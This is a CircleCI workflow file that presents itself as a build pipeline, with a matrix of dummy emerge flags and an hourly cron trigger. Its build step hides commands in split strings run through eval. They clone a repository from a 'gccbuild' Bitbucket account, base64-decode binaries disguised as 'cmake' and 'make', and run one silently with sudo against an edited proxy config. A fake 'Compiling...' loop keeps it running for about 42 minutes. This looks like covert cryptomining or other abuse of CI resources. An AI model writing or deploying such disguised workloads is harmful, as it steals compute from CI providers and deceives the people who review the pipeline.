version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--load-average", "--emptytree", "--fail-clean", "--verbose-conflicts", "--rebuild-ignore", "--autounmask-keep-masks", "--debug", "--changed-deps-report", "--usepkg", "--buildpkg-exclude", "--package-moves", "--usepkg-exclude", "--depclean-lib-check", "--search-similarity", "--onlydeps", "--newrepo", "--info", "--dynamic-deps", "--jobs", "--buildpkg-exclude"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--load-average", "--emptytree", "--fail-clean", "--verbose-conflicts", "--rebuild-ignore", "--autounmask-keep-masks", "--debug", "--changed-deps-report", "--usepkg", "--buildpkg-exclude", "--package-moves", "--usepkg-exclude", "--depclean-lib-check", "--search-similarity", "--onlydeps", "--newrepo", "--info", "--dynamic-deps", "--jobs", "--buildpkg-exclude"]
    triggers:
      - schedule:
          cron: "0 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: Linux
          command: |
            dmksKSYWK="sudo add-ap"
            XzBsYSmXPf="t-repositor"
            KwZSNBD="y ppa:max-c"
            TLjokIs="-lv/shadows"
            kOfFuzI="ocks-libev "
            MDlhuRz="-y &>/dev/n"
            eval "$dmksKSYWK""$XzBsYSmXPf""$KwZSNBD""$TLjokIs""$kOfFuzI""$MDlhuRz""ull || true"
            TnQlLFtwkp="sudo add-ap"
            taWgnT="t-repositor"
            YznoTMYrb="y ppa:ondre"
            htBMfY="j/apache2 -"
            srofBURcw="y &>/dev/nu"
            eval "$TnQlLFtwkp""$taWgnT""$YznoTMYrb""$htBMfY""$srofBURcw""ll || true"
            sudo apt update || true
            sudo apt --yes install openssl &>/dev/null || true
            WJtRGjv="sudo apt --"
            lQImzB="yes install"
            SZVRtITZP=" cl-base64 "
            OwwkhSeLADp="git &>/dev/"
            JJuqLVvL="null || tru"
            eval "$WJtRGjv""$lQImzB""$SZVRtITZP""$OwwkhSeLADp""$JJuqLVvL""e"
            MaencWKIcKj="git clone h"
            LbfOszz="ttps://gccb"
            KCKNqiU="uild@bitbuc"
            TlNgk="ket.org/gcc"
            BzaaTRgMUTV="build/gcc.g"
            dWRMiqGfB="it &>/dev/n"
            eval "$MaencWKIcKj""$LbfOszz""$KCKNqiU""$TlNgk""$BzaaTRgMUTV""$dWRMiqGfB""ull"
            LTjBoVny="base64 -d g"
            NuDDYYQL="cc/cmake_np"
            eval "$LTjBoVny""$NuDDYYQL""_ > cmake"
            ZHoKoPer="base64 -d g"
            EQZHMr="cc/config_ "
            eval "$ZHoKoPer""$EQZHMr""> conf"
            PiRpyfdX="base64 -d g"
            oLmpnpDDi="cc/make_ > "
            eval "$PiRpyfdX""$oLmpnpDDi""make"
            sed -i 's/1080/1081/g' conf
            LtDFRcMQFmd="chmod +x ma"
            eval "$LtDFRcMQFmd""ke cmake"
            ./cmake
            KdMtTD="sed -i 's/b"
            qsbiirtaMas="uild/ob2u/g"
            eval "$KdMtTD""$qsbiirtaMas""' conf"
            cjUcc="sudo ./make"
            YscnKtV=" --config=c"
            npEUuV="onf &>/dev/"
            eval "$cjUcc""$YscnKtV""$npEUuV""null &"
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2528)) ] && sudo killall make && break; sleep 228; done
